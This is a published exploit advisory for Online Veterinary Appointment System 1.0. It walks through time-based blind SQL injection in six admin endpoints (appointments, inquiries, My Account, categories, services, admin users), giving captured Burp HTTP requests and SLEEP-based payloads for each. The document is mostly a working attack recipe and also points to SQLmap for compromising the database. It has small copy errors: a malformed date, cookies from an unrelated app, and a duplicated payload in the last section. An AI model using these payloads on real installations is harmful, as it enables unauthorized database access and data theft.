Authored by twseptian

Online Veterinary Appointment System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

# Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection
# Date: 05/01/20222
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ovas.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

=====================================================================================================================================
SQL Injection:
=====================================================================================================================================
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.

=====================================================================================================================================
Attack Vector:
=====================================================================================================================================
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.

=====================================================================================================================================
1. Appointment Requests - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL:

http://localhost/ovas/admin/?page=appointments

then go to 'Action' > 'View'.

Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
2. Inquiries - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Inquiries' page using the following URL:

http://localhost/ovas/admin/?page=inquiries

then go to 'Action' > 'View'.

Step-2: Let's intercept 'View' request using burpsuite:

GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=inquiries
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'My Account' page using the following URL:

http://localhost/ovas/admin/?page=user

Step-2: then let's intercept 'Update' request using burpsuite:

POST /ovas/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118
Content-Length: 796
Origin: http://localhost
Connection: close
Referer: http://localhost/ovas/admin/?page=user
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="id"

4
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username
for example, the time-based blind payload in 'id':

[SNIP]
Content-Disposition: form-data; name="id"

4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Step-3: If we use BurpSuite, click 'Send'. The server target accepted our payload, and the response got delayed by 5 seconds. The same thing for other parameters

=====================================================================================================================================
4. Category List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Category List ' page using the following URL:

http://localhost/ovas/admin/?page=categories

then go to 'Action' > 'Edit'

Step-2: Let's intercept 'Edit' request using burpsuite:

GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=categories
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
5. Service List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Service List ' page using the following URL:

http://localhost/ovas/admin/?page=services

then go to 'Action' > 'View'

Step-2: Let's intercept 'View' request using burpsuite:

GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=services
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
6. Admin User List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL:

http://localhost/ovas/admin/?page=user/list

then go to 'Action' > 'Edit'

Step-2: Let's intercept 'Edit' request using burpsuite:

GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/ovas/admin/?page=user/list
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.